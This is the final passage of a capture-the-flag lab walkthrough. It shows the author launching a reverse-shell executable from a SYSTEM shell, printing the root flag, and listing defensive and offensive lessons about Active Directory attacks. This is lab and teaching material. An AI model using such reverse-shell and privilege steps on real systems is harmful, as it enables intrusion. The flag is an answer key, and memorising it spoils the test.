smbexec's semi-interactive shell is a little limiting as far as the commands you can use, so I kill my earlier reverse shell on port 443, restart the listener, and launch shell.exe again from the SYSTEM shell to get a proper one.

C:\Windows\system32>C:\Users\svc_loanmgr\Documents\shell.exe

images/Untitled12.png

root.txt
f3ee04965c68257382e31502cc5e881f

Lessons Learned

Defense

  • Disabling Pre-Authentication on AD accounts is dangerous. Find another way to design your architecture.
  • Conventional username schemes are common and easy to guess, so don't list your team members' full names on the website.
  • Monitor accounts with DCSync privileges for unusual activity.

Offense

  • Even if you run a limited port scan and find a lot of interesting ports, always go back and run the full port scan.
  • Sometimes your first assumption is wrong (my assumption that the domain was sauna.htb), so remember what depended on it and go back and re-enumerate once that assumption is proven wrong.
  • Don't spend too much time on rabbit holes; sometimes the answer really is brute-forcing. You might get lucky.
  • Each time you get an account, re-enumerate.